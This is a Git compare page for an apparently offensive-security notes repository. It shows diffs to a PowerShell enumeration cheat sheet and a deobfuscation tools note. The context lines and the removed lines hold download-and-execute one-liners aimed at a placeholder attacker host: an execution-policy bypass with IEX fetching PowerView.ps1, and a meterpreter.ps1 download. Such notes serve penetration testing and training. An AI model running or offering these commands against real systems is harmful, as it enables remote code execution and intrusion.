whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Compare commits

base: whx:e597409caf267fc054bf50d141082e530c62b1a2
Branches Tags
whx:master
..
compare: whx:495e5c972f16b0b9d021d27aca55952505214ad7
Branches Tags
whx:master

No commits in common. "e597409caf267fc054bf50d141082e530c62b1a2" and "495e5c972f16b0b9d021d27aca55952505214ad7" have entirely different histories.
e597409caf ... 495e5c972f

2 changed files with 0 additions and 9 deletions
Show Stats Expand all files Collapse all files

5
enumeration/windows/powershell.md
View File

@ -129,11 +129,6 @@ Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
* Webrequest and execute in one go
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))

4
reverse_engineering/docs/deobfuscation.md
View File

@ -1,4 +0,0 @@
# Deobfuscation
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well